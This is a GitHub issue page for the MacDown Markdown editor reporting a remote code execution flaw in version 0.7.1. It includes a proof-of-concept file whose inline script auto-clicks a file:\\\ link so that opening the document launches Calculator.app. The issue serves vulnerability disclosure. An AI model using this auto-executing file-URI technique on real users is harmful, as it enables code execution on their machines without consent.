MacDownApp/macdown

Macdown Version 0.7.1 (870) Remote Code Execution

Open

#1,050 创建于 2019年1月28日

在 GitHub 查看
 (7 评论) (1 反应) (0 负责人)Objective-C (930 fork)batch import
help wantedon hold

仓库指标

Star
 (7,686 star)
PR 合并指标
 (30 天内没有已合并 PR)

描述

Macdown Version 0.7.1 (870) Remote Code Execution

Macdown version 0.7.1 (870) is affected by a remote code execution vulnerability. Macdown fails to sanitize input on HTML attributes. Abusing thefile:\\ URI scheme on HTML attributes can result in arbitrary code execution. The attached proof of concept will execute the MacOS Calculator.app when opened inside of Macdown.

PoC (PoC.md):

<!DOCTYPE html>
<html>
<body>

<a href="file:\\\Applications\Calculator.app" id=exploit download>
  <img src="/images/exploit.jpg" alt="exploit" width="104" height="142">
</a>

<script>
(function download() {
    document.getElementById('exploit').click();
})()
</script>

</body>
</html>

Screenshot:

PoC.md.zip

贡献者指南